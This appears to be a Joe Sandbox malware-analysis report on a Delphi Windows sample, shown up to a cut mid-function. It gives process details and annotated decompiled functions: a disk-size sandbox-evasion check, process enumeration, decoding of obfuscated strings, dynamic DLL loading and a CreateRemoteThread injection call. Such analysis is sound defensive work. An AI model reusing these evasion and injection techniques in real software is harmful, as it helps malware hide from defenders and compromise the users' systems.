                                                        File size:1'256'960 bytes
                                                        MD5 hash:91EE39F4A80F60A938095424EEF2C709
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi

                                                        Target ID:25
                                                        Start time:14:02:10
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
                                                        Imagebase:0x1000000
                                                        File size:2'560 bytes
                                                        MD5 hash:FE48113F3A78F980634E8CDACABF5091
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi

                                                        Target ID:26
                                                        Start time:14:02:49
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
                                                        Imagebase:0xed0000
                                                        File size:337'920 bytes
                                                        MD5 hash:29F917BF3DE95D7CE5B6B38CB7A895AB
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language


                                                          Execution Graph

                                                          Execution Coverage:14.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:1%
                                                          Total number of Nodes:683
                                                          Total number of Limit Nodes:41
                                                          [execution_graph: the 683-node graph is rendered as an interactive figure in the original report; its raw node/edge token stream is not reproduced here. API call nodes present in the graph, with the sample code address of the node that calls them:]
                                                          • Registry / file system: RegCloseKey (45bd7c), CreateFileA (45be9c), ReadFile (45c998), WriteFile (45c900), GetFileAttributesA (45c5d5), FindNextFileA (45402c), FindCloseChangeNotification (45afdc), MapViewOfFile (458770), GetDiskFreeSpaceExA (450548)
                                                          • System / environment: GlobalMemoryStatusEx (450ec5), SystemParametersInfoA (459ec5), FindWindowA (45b31b), LoadLibraryA (45a78a), GetPEB (458b40)
                                                          • Process enumeration: CreateToolhelp32Snapshot (432f73), Process32First (432f93), Process32Next (432fb3)
                                                          • Thread injection: CreateRemoteThread (45cb4c, 43b3f0), GetExitCodeThread (43b3f0)
                                                          • Network: socket (42c849), bind (428120), connect (42813c), getsockname (42cc9c, 42ccbc), getpeername (42ccbc), htons (42c7b8), inet_ntoa (428719), getnameinfo (428773)
C-Code - Quality: 100%
			E00450548() {
				union _ULARGE_INTEGER _v8;   // lpTotalNumberOfFreeBytes
				intOrPtr _v12;               // high dword of _v16: the decompiler split the 64-bit total into two locals
				union _ULARGE_INTEGER _v16;  // lpTotalNumberOfBytes
				union _ULARGE_INTEGER _v24;  // lpFreeBytesAvailableToCaller
				int _t11;

				// Size query on the system drive. The decompiler printed the literal as "C:\", which is an
				// unterminated C string; the actual argument (see the API trace below) is the three bytes C:\ .
				_t11 = GetDiskFreeSpaceExA("C:\\",  &_v24,  &_v16,  &_v8); // executed
				if(_t11 == 0) {
					return 0x539; // 1337, the sentinel returned when the query fails
				}
				// Hands the full 64-bit total size of C: (low dword, high dword) together with the constant
				// 0x40000000 (1 GiB, as low/high dwords) to L004055DC, an untagged RTL helper that is most
				// likely a 64-bit compare. A system volume smaller than about 1 GiB is a common sandbox
				// heuristic, which matches the report's "tries to detect sandboxes" signature.
				return L004055DC(_v16.LowPart, _v12, 0x40000000, 0);
			}

                                                          APIs
                                                          • GetDiskFreeSpaceExA.KERNELBASE(C:\,?,?,?), ref: 00450566
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: DiskFreeSpace
                                                          • String ID: C:\
                                                          • API String ID: 1705453755-3404278061
                                                          • Opcode ID: 7496b98025ce4f7b9d14c3b6795b5443bf8b9c250aacdadc338490ddbde4953b
                                                          • Instruction ID: db58301a327e31e3cbebd4ed348a9e37d6cd253c59348fca2cf526f75b404a74
                                                          • Opcode Fuzzy Hash: 7496b98025ce4f7b9d14c3b6795b5443bf8b9c250aacdadc338490ddbde4953b
                                                          • Instruction Fuzzy Hash: AFE01ABA204605ABD310DA18CC41F5B73D8AB84301FA44926BD51D7291EB74EE08CF9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 38%
			// This matches the Delphi RTL routine SysInit.LoadResourceModule: it looks for a localized
			// resource DLL named <executable>.<locale> next to the program, honouring an override stored
			// under Software\Borland\Locales. The L0040xxxx callees are import thunks; the API behind each
			// one is inferred from its argument pattern and agrees with the RTL source.
			E00405D90(intOrPtr __eax) {
				intOrPtr _v8;        // ModuleName argument (Delphi register convention: passed in eax)
				char _v12;           // HKEY returned by RegOpenKeyExA
				char _v15;           // _v17[2]: zeroed to shorten the 3-letter abbreviation ("ENU" -> "EN")
				char _v17;           // LocaleName[0..4] from GetLocaleInfoA(LOCALE_SABBREVLANGNAME)
				char _v18;           // LocaleOverride[4], forced to NUL
				char _v22;           // LocaleOverride[0..4] read from the registry
				char _v28;           // Size (cbData) for RegQueryValueExA
				char* _v32;          // P: cursor scanning backwards for the last '.'
				char _v293;          // FileName[0..0x104]
				char* _t56;
				char _t63;
				char _t65;
				char _t68;
				char* _t69;
				char* _t70;
				char* _t73;
				char* _t75;
				char* _t78;
				char* _t84;
				char* _t90;
				char* _t95;
				char* _t98;
				intOrPtr _t103;
				void* _t112;
				void* _t114;
				intOrPtr _t115;

				_t112 = _t114;
				_t115 = _t114 + 0xfffffedc; // sub esp, 0x124
				_v8 = __eax;
				_push(0x105);
				_push( &_v293);
				_push(0);
				L0040126C(); // GetModuleFileNameA(0, FileName, 0x105): the host executable's path
				_v22 = 0;
				_t56 =  &_v12;
				_push(_t56);
				_push(0xf0019); // KEY_READ
				_push(0);
				_push("Software\\Borland\\Locales");
				_push(0x80000001); // HKEY_CURRENT_USER; executed
				L004012C4(); // RegOpenKeyExA; executed
				if(_t56 == 0) {
					L3:
					// try/finally frame. 0x405e94 is the finally handler; the "return _t65" at the end of
					// this block is really the jump to 0x405e9b, i.e. the locale-loading code that the
					// decompiler placed under the no-registry-key branch below. Both paths execute it.
					_push(_t112);
					_push(0x405e94);
					_push( *[fs:eax]);
					 *[fs:eax] = _t115;
					_v28 = 5; // Size := SizeOf(LocaleOverride)
					L00405BB8( &_v293, 0x105); // untagged local helper applied to the path buffer before it is used as the value name
					_push( &_v28);
					_push( &_v22);
					_push(0);
					_push(0);
					_push( &_v293);
					_t63 = _v12;
					_push(_t63);
					L004012CC(); // RegQueryValueExA(Key, FileName, NULL, NULL, LocaleOverride, &Size)
					if(_t63 != 0) {
						// no per-executable override: fall back to the key's default value
						_push( &_v28);
						_push( &_v22);
						_push(0);
						_push(0);
						_push(E00406010); // "" (empty value name)
						_t68 = _v12;
						_push(_t68);
						L004012CC(); // RegQueryValueExA(Key, "", NULL, NULL, LocaleOverride, &Size)
						if(_t68 != 0) {
							_v22 = 0; // no override at all
						}
					}
					_v18 = 0; // LocaleOverride[4] := #0
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x405e9b);
					_t65 = _v12;
					_push(_t65);
					L004012BC(); // RegCloseKey; execution then continues at 0x405e9b (the lstrcpynA below)
					return _t65;
				} else {
					_t69 =  &_v12;
					_push(_t69);
					_push(0xf0019); // KEY_READ
					_push(0);
					_push("Software\\Borland\\Locales");
					_push(0x80000002); // HKEY_LOCAL_MACHINE
					L004012C4(); // RegOpenKeyExA
					if(_t69 == 0) {
						goto L3;
					} else {
						_t70 =  &_v12;
						_push(_t70);
						_push(0xf0019); // KEY_READ
						_push(0);
						_push("Software\\Borland\\Delphi\\Locales"); // legacy key name
						_push(0x80000001); // HKEY_CURRENT_USER
						L004012C4(); // RegOpenKeyExA
						if(_t70 != 0) {
							// --- resource-module search (also reached from L3 via 0x405e9b) ---
							_push(0x105);
							_push(_v8);
							_push( &_v293);
							L004012A4(); // lstrcpynA(FileName, ModuleName, 0x105)
							_push(5);
							_t73 =  &_v17;
							_push(_t73);
							_push(3); // LOCALE_SABBREVLANGNAME
							L0040128C(); // GetThreadLocale; its eax result, not _t73, is the LCID pushed next
							_push(_t73); // executed
							L00401264(); // GetLocaleInfoA(lcid, LOCALE_SABBREVLANGNAME, LocaleName, 5); executed
							_t98 = 0;
							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t75 =  &_v293;
								_push(_t75);
								L004012AC(); // lstrlenA(FileName)
								_v32 = _t75 +  &_v293; // P := FileName + length
								// walk back to the last '.' (any dot in the path, not only the extension) or the buffer start
								while( *_v32 != 0x2e &&  &_v293 != _v32) {
									_v32 = _v32 - 1;
								}
								_t78 =  &_v293;
								if(_t78 != _v32) {
									_v32 = _v32 + 1; // overwrite what follows the dot
									if(_v22 != 0) {
										// 1) <name>.<registry override>
										_push(0x105 - _v32 - _t78); // remaining room in the buffer
										_push( &_v22);
										_push(_v32);
										L004012A4(); // lstrcpynA
										_push(2); // LOAD_LIBRARY_AS_DATAFILE: mapped for resources only, DllMain never runs
										_push(0);
										_t95 =  &_v293;
										_push(_t95);
										L00401294(); // LoadLibraryExA(FileName, 0, 2)
										_t98 = _t95;
									}
									if(_t98 == 0 && _v17 != 0) {
										// 2) <name>.<language+country>, e.g. .ENU
										_push(0x105 - _v32 -  &_v293);
										_push( &_v17);
										_push(_v32);
										L004012A4(); // lstrcpynA
										_push(2); // LOAD_LIBRARY_AS_DATAFILE
										_push(0);
										_t84 =  &_v293;
										_push(_t84); // executed
										L00401294(); // LoadLibraryExA; executed
										_t98 = _t84;
										if(_t98 == 0) {
											// 3) <name>.<language only>, e.g. .EN
											_v15 = 0; // LocaleName[2] := #0
											_push(0x105 - _v32 -  &_v293);
											_push( &_v17);
											_push(_v32);
											L004012A4(); // lstrcpynA
											_push(2); // LOAD_LIBRARY_AS_DATAFILE
											_push(0);
											_t90 =  &_v293;
											_push(_t90); // executed
											L00401294(); // LoadLibraryExA; executed
											_t98 = _t90;
										}
									}
								}
							}
							return _t98; // module handle of the resource DLL, or 0
						} else {
							goto L3;
						}
					}
				}
			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                          • API String ID: 0-2375825460
                                                          • Opcode ID: 76ac0e89c027f59c30c75084f5d6946d4f2fb264631676b9ee32f3a8e279c80b
                                                          • Instruction ID: 4161aafb646a41738e94a827faff96e70000a86aab9d96329987de3ce5b78809
                                                          • Opcode Fuzzy Hash: 76ac0e89c027f59c30c75084f5d6946d4f2fb264631676b9ee32f3a8e279c80b
                                                          • Instruction Fuzzy Hash: EA612B75A046497EEB10DAE5CC46FEFB7BCDB08704F4040B6A644F61C1D6BC9A458BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
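How the locale lookup in E00405D90 turns a module path into the resource-DLL names it will probe, as an added example that is not code from the sample or from the Joe Sandbox report. It reproduces only the string handling of the routine: the registry override and the locale abbreviation are passed in as constructed values standing in for what RegQueryValueExA and GetLocaleInfoA would return, and the function name is the example's own.

```python
# Added example, not the sample's code: reproduces the candidate-name derivation of
# E00405D90 (Delphi LoadResourceModule). Registry/locale inputs are constructed.
from typing import List, Optional

BUFFER_SIZE = 0x105  # size the routine passes to GetModuleFileNameA / lstrcpynA


def resource_module_candidates(module_path: str,
                               registry_override: Optional[str],
                               locale_abbrev: Optional[str]) -> List[str]:
    """Names tried in order with LoadLibraryEx(..., LOAD_LIBRARY_AS_DATAFILE)
    until one loads. registry_override mirrors _v22, locale_abbrev mirrors _v17."""
    # if(_v293 != 0 && (_v17 != 0 || _v22 != 0))
    if not module_path or not (registry_override or locale_abbrev):
        return []
    # the loop walks back from the end until it hits '.' or the buffer start;
    # it does not care whether the dot belongs to the file name or a directory
    dot = module_path.rfind('.')
    if dot == -1:          # P == @FileName: nothing is tried
        return []
    base = module_path[:dot + 1]      # P is advanced past the dot before copying
    room = BUFFER_SIZE - len(base)    # 0x105 - (P - FileName), passed to lstrcpynA
    # lstrcpynA copies at most room-1 characters and NUL-terminates
    candidates = []
    if registry_override:
        candidates.append(base + registry_override[:room - 1])      # 1) registry override
    if locale_abbrev:
        candidates.append(base + locale_abbrev[:room - 1])          # 2) e.g. app.ENU
        # _v15 = 0 truncates the abbreviation to its first two characters
        candidates.append(base + locale_abbrev[:2][:room - 1])      # 3) e.g. app.EN
    return candidates


if __name__ == "__main__":
    for name in resource_module_candidates(r"C:\ProgramData\app.exe", "DEU", "ENU"):
        print(name)
```

The candidates are mapped with LOAD_LIBRARY_AS_DATAFILE, so a file planted under one of these names beside the executable can substitute resources (strings, dialogs, version info) but never runs its entry point. Because the scan stops at the last dot anywhere in the path, a module without an extension inside a dotted directory yields candidates that replace the tail of that directory name, exactly as the original loop does.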

C-Code - Quality: 100%
			// Thin wrapper around CreateToolhelp32Snapshot. E00432CE8 (untagged) gates the call and
			// receives the same flags value; when it returns 0 the wrapper returns 0 instead of taking
			// a snapshot. The API trace below records the observed call as
			// CreateToolhelp32Snapshot(0xF, 0), i.e. TH32CS_SNAPALL for every process, the usual
			// first step before walking the process list with Process32First/Process32Next.
			E00432F64(int __eax, int __edx) {
				void* _t4;
				int _t5;

				_t5 = __eax; // dwFlags
				if(E00432CE8(__eax) == 0) {
					return 0;
				} else {
					_t4 = CreateToolhelp32Snapshot(_t5, __edx); // (dwFlags, th32ProcessID); executed
					return _t4; // snapshot handle, or INVALID_HANDLE_VALUE on failure
				}
			}

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,0045394C,00000000,00453A29,?,?,?,?,?,00451AF1,00000000,004520F1), ref: 00432F75
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3332741929-0
                                                          • Opcode ID: 733397445a262a148621dee03f2eecfeabb97f64792a6ceb650574993d51690f
                                                          • Instruction ID: 441394c59263b91a7345582c66c5c8aac05b507405de6dc1346df3a78ef199f2
                                                          • Opcode Fuzzy Hash: 733397445a262a148621dee03f2eecfeabb97f64792a6ceb650574993d51690f
                                                          • Instruction Fuzzy Hash: 3BC08072203220574A1066F93E844C7674DDD4D1F770414B3F508D3111D2A94C0051D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 54%
			// This matches the Delphi RTL routine SysUtils.FileAge: it returns the file's last-write
			// time as a packed DOS date/time (FAT date in the high word, FAT time in the low word),
			// or -1 when the name is not found or refers to a directory. The L00406xxx callees are
			// import thunks; the API behind each one is inferred from its arguments.
			E004089B0(void* __eax) {
				char _v6;            // FAT date (high word of the result)
				char _v8;            // FAT time (low word of the result); the whole dword is the return value
				char _v16;           // local FILETIME
				char _v316;          // WIN32_FIND_DATA.ftLastWriteTime (offset 20 into _v336)
				signed char _v336;   // WIN32_FIND_DATA; its first dword is dwFileAttributes
				void* _t15;
				char* _t21;

				_push( &_v336);
				_t15 = E004049DC(__eax); // Delphi string -> PChar
				_push(_t15); // executed
				L00406AD0(); // FindFirstFileA(name, &_v336); executed
				if(_t15 == 0xffffffff) { // INVALID_HANDLE_VALUE: file not found
					L3:
					_v8 = 0xffffffff; // Result := -1
				} else {
					_push(_t15);
					L00406AC8(); // FindClose(handle)
					if((_v336 & 0x00000010) != 0) { // FILE_ATTRIBUTE_DIRECTORY
						goto L3;
					} else {
						_push( &_v16);
						_push( &_v316);
						L00406AC0(); // FileTimeToLocalFileTime(&ftLastWriteTime, &_v16)
						_push( &_v8);
						_push( &_v6);
						_t21 =  &_v16;
						_push(_t21);
						L00406AB8(); // FileTimeToDosDateTime(&_v16, &_v6 /* date */, &_v8 /* time */)
						if(_t21 == 0) {
							goto L3; // time outside the DOS range (before 1980): -1
						}
					}
				}
				return _v8; // _v6:_v8 read as one dword; the decompiler only names the low word
			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02273a2473c25eba7cfda50f82d8c7b30cd6e519b0584f8d3b0c9db99afcf0a7
                                                          • Instruction ID: f259f0587b9190be05b10604731cac30839b57d2bbc0c547e791ddb3aae5eec2
                                                          • Opcode Fuzzy Hash: 02273a2473c25eba7cfda50f82d8c7b30cd6e519b0584f8d3b0c9db99afcf0a7
                                                          • Instruction Fuzzy Hash: 31F06871E0020C66CB10FAF58D859CF73AC5B05324F0046BBB516F31C2EA389B184F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E00408AB8(void* __eax, void* __ecx, signed int __edx) {
                                                          				intOrPtr _t7;
                                                          				void* _t13;
                                                          				intOrPtr _t19;
                                                          				intOrPtr _t20;
                                                          
                                                          				_t13 = __ecx;
                                                          				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
                                                          				_push(__ecx + 0x18);
                                                          				_t7 = E004049DC(__eax);
                                                          				_push(_t7); // executed
                                                          				L00406AD0(); // executed
                                                          				_t19 = _t7;
                                                          				 *((intOrPtr*)(__ecx + 0x14)) = _t19;
                                                          				if(_t19 == 0xffffffff) {
                                                          					L00406B70();
                                                          					_t20 = _t7;
                                                          				} else {
                                                          					_t20 = E00408A4C(__ecx);
                                                          					if(_t20 != 0) {
                                                          						E00408B08(_t13);
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d10b05cbd45f92be0d39b7577bcf61463cce2fc500189306f03d1bcc4dd3fa9c
                                                          • Instruction ID: b97388968554a38406bd61a2b92880eb75e2f1923efb552beec36330594efac2
                                                          • Opcode Fuzzy Hash: d10b05cbd45f92be0d39b7577bcf61463cce2fc500189306f03d1bcc4dd3fa9c
                                                          • Instruction Fuzzy Hash: 8EE06DB2B012200BC714BEBE5D8155B65988A847B4309027FB955FB7C7DE7CCC125BD8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 80%
                                                          			E00451190(intOrPtr* __eax, void* __ecx) {
                                                          				char _v264;
                                                          				char _v272;
                                                          				char* _t5;
                                                          				intOrPtr* _t22;
                                                          
                                                          				_t22 =  &_v264;
                                                          				_t14 = __eax;
                                                          				if( *((intOrPtr*)( *0x46eea8)) == 0) {
                                                          					 *_t22 = 0x101;
                                                          					_push(_t22);
                                                          					_t5 =  &_v264;
                                                          					_push(_t5); // executed
                                                          					L00406A38(); // executed
                                                          					if(_t5 == 0) {
                                                          						E00404500(__eax);
                                                          					} else {
                                                          						E00404B0C(__eax,  *_t22 - 1);
                                                          					}
                                                          					return E00404770(_t14, 0x101,  &_v272);
                                                          				}
                                                          				return E00404554(__eax,  *((intOrPtr*)( *0x46eea8)));
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d47540d9bd3baafff8c38723ecf78aeed3153fa4359a83e1ecaff3ea5f2966e4
                                                          • Instruction ID: d62d6f790af639b0246b6a1af51f328c3d488a4fcc2064ade4d8be2eb8e36490
                                                          • Opcode Fuzzy Hash: d47540d9bd3baafff8c38723ecf78aeed3153fa4359a83e1ecaff3ea5f2966e4
                                                          • Instruction Fuzzy Hash: A8F0B4753001006BC300FA6ADC81B9673E59B89305F04453EBA85973A2EBBDDC89974A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004517BC() {
                                                          				intOrPtr _v20;
                                                          
                                                          				L00406BB8(); // executed
                                                          				return _v20;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7fc2f88f9f435fc4a24b3998b04bb3cb65d64b0ddd0e5d387d14baff089bb51
                                                          • Instruction ID: 65f6c7b149dcbbfe471bcd5a2b1ff86d70ebb976ed11110e6e5b5f892fbfa128
                                                          • Opcode Fuzzy Hash: d7fc2f88f9f435fc4a24b3998b04bb3cb65d64b0ddd0e5d387d14baff089bb51
                                                          • Instruction Fuzzy Hash: 13A012504084000AC404A7194C4340F32981941214FC40264749DF53C2E619967403DB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 45%
                                                          			E0045A730(void* __ebx, void* __esi, void* __eflags) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				struct HINSTANCE__* _t22;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				void* _t59;
                                                          				intOrPtr _t61;
                                                          
                                                          				 *[fs:eax] = _t61;
                                                          				L00406B90();
                                                          				 *0x470fa4 = 0;
                                                          				 *0x470f9c = L00406B98; // resolver thunk used for every runtime name lookup in this function and in E0045CB08
                                                          				L00455C58("c0SDpiKvxEnDhE6Y",  &_v8); // decode the obfuscated literal into _v8 (string-decoding helper; the report flags such "potential string decryption" routines)
                                                          				 *0x470f98 =  *0x470f9c( *0x470fa4, E004049DC(_v8), "kernel32.dll",  *[fs:eax], 0x45a834, _t61, __ebx, 0, 0, 0, 0, 0, 0, _t59); // resolve the decoded name (the "kernel32.dll" literal is among the arguments; the remaining arguments are decompiler stack noise at quality 45%) and keep the pointer at 0x470f98
                                                          				_t22 = LoadLibraryA("Urlmon.dll"); // executed; the only library load that goes through the import table
                                                          				 *0x470fac = _t22;
                                                          				 *0x470fa0 =  *0x470f98("user32.dll"); // the remaining DLLs are loaded through the resolved pointer, which takes one DLL-name argument and returns a handle stored beside the Urlmon.dll one
                                                          				 *0x470fa8 =  *0x470f98("Advapi32.dll");
                                                          				 *0x470fb0 =  *0x470f98("Shell32.dll");
                                                          				 *0x470fb4 =  *0x470f98("ntdll.dll");
                                                          				E0045A680( &_v16, __esi);
                                                          				E00408158(_v16, 0,  &_v12);
                                                          				_push(_v12);
                                                          				L00455C58("hPnVpbnD+HZDF0i",  &_v20);
                                                          				_pop(_t54);
                                                          				if(E00404AC4(_v20, _t54) > 0) {
                                                          					E0045A680( &_v28, __esi);
                                                          					E00408C1C(_v28, 0,  &_v24);
                                                          					E0045ABB8(E004049DC(_v24), 0x470f98);
                                                          				}
                                                          				_pop(_t55);
                                                          				 *[fs:eax] = _t55;
                                                          				_push(0x45a83b);
                                                          				return E00404524( &_v28, 6);
                                                          			}

                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(Urlmon.dll,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045A791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: Advapi32.dll$Shell32.dll$Urlmon.dll$c0SDpiKvxEnDhE6Y$hPnVpbnD+HZDF0i$kernel32.dll$ntdll.dll$user32.dll
                                                          • API String ID: 1029625771-904844578
                                                          • Opcode ID: 953c7499bacdc6838976175f7a58c61cc882fb27326cc90128f42f89926a452e
                                                          • Instruction ID: 6bbf18412a218639c5176dab177573abf56b07266dd18c0e4c0bf412ab12914d
                                                          • Opcode Fuzzy Hash: 953c7499bacdc6838976175f7a58c61cc882fb27326cc90128f42f89926a452e
                                                          • Instruction Fuzzy Hash: B5218DB0600205DFDB10FFA5C84696E7BB4EB49305B50453BF904E7392DBB86919CB6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E0042C7D8(void* __edx, void* __ebp, void* __eflags) {
                                                          				signed short _v40;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				void* _t24;
                                                          				signed int _t26;
                                                          				intOrPtr _t35;
                                                          				intOrPtr* _t53;
                                                          				intOrPtr _t68;
                                                          				void* _t71;
                                                          
                                                          				_t53 = memcpy(_t71, __edx, 7 << 2);
                                                          				 *((char*)(_t53 + 0x1a8)) = 0;
                                                          				 *((intOrPtr*)(_t53 + 0x19c)) = 0;
                                                          				 *((intOrPtr*)(_t53 + 0x1a0)) = 0;
                                                          				_t24 = L0042DB4C(_t53);
                                                          				if( *((intOrPtr*)(_t53 + 0x1b8)) == 0xffffffff) {
                                                          					_t26 = E00404500(_t53 + 0x6c);
                                                          					 *((char*)(_t53 + 0x8b)) = 0;
                                                          				 *((char*)(_t53 + 0x8e)) = _t26 & 0xffffff00 | _v40 == 0x00000017; // 0x17 == AF_INET6: the byte at +0x8e records whether this handle is an IPv6 socket
                                                          				_t35 =  *((intOrPtr*)( *((intOrPtr*)( *0x46edac))))(_v40 & 0x0000ffff,  *((intOrPtr*)( *_t53 + 0xac))( *((intOrPtr*)( *_t53 + 0xb0))())); // executed: socket() from WS2_32 (APIs, ref 0042C857) with the address family in _v40
                                                          				_t68 = _t35;
                                                          				 *((intOrPtr*)(_t53 + 0x1b8)) = _t68; // socket handle kept at +0x1b8
                                                          				_t69 = _t68 + 1;
                                                          				if(_t68 + 1 == 0) { // _t68 == 0xffffffff (INVALID_SOCKET): socket() failed
                                                          					 *((intOrPtr*)(_t53 + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)( *0x46f098))))(); // result of the call through 0x46f098 stored at +0x1bc (error retrieval by position; the report does not name this API)
                                                          				}
                                                          				E004280DC(_t53 + 0x98);
                                                          				E004280CC( *((intOrPtr*)(_t53 + 0x1b8)), _t53 + 0x98);
                                                          				L0042DBDC(_t53, _t53, _t69);
                                                          				if( *((char*)(_t53 + 0x8e)) == 0) { // pick one of the "IPv4"/"IPv6" literals listed under String ID according to the IPv6 flag
                                                          					E0042E528(_t53, 0x42c8ec, 2);
                                                          				} else {
                                                          					E0042E528(_t53, 0x42c8dc, 2);
                                                          				}
                                                          					E0042C5FC(_t53);
                                                          					return E0042E5E0(_t53);
                                                          				}
                                                          				return _t24;
                                                          			}

                                                          APIs
                                                          • socket.WS2_32(?,00000000), ref: 0042C857
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: IPv4$IPv6
                                                          • API String ID: 98920635-3648194996
                                                          • Opcode ID: 1a41851a1eb0b24a2aa6360a3adb8c0896534a2a81217a1e90fc9d0d6a4b39f1
                                                          • Instruction ID: 1637d47d46f8d72e1445dd2501cfa02ef1482c8825976e76a7a7ae75c54e74c3
                                                          • Opcode Fuzzy Hash: 1a41851a1eb0b24a2aa6360a3adb8c0896534a2a81217a1e90fc9d0d6a4b39f1
                                                          • Instruction Fuzzy Hash: EB213B317042109FC740EF69E8C078A37D5AF45315F4885BAA989CF357EB789948CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E0045CB08(void* __eax, void* __ebx, long __ecx, struct _SECURITY_ATTRIBUTES* __edx, void* __esi, DWORD* _a4, long _a8, void* _a12, _Unknown_base(*)()* _a16) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _t25;
                                                          				intOrPtr _t37;
                                                          				struct _SECURITY_ATTRIBUTES* _t39;
                                                          				void* _t40;
                                                          				void* _t42;
                                                          
                                                          				_v12 = 0;
                                                          				_v8 = __ecx;
                                                          				_t39 = __edx;
                                                          				_t25 = __eax;
                                                          				 *[fs:eax] = _t42 + 0xfffffff8;
                                                          				L00455C58("7bn6x5Z6jaWX+bZ6W0DlpHNu",  &_v12);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45cb7c, _t42, __esi, __ebx, _t40);
                                                          				CreateRemoteThread(_t25, _t39, _v8, _a16, _a12, _a8, _a4); // executed
                                                          				_pop(_t37);
                                                          				 *[fs:eax] = _t37;
                                                          				_push(E0045CB83);
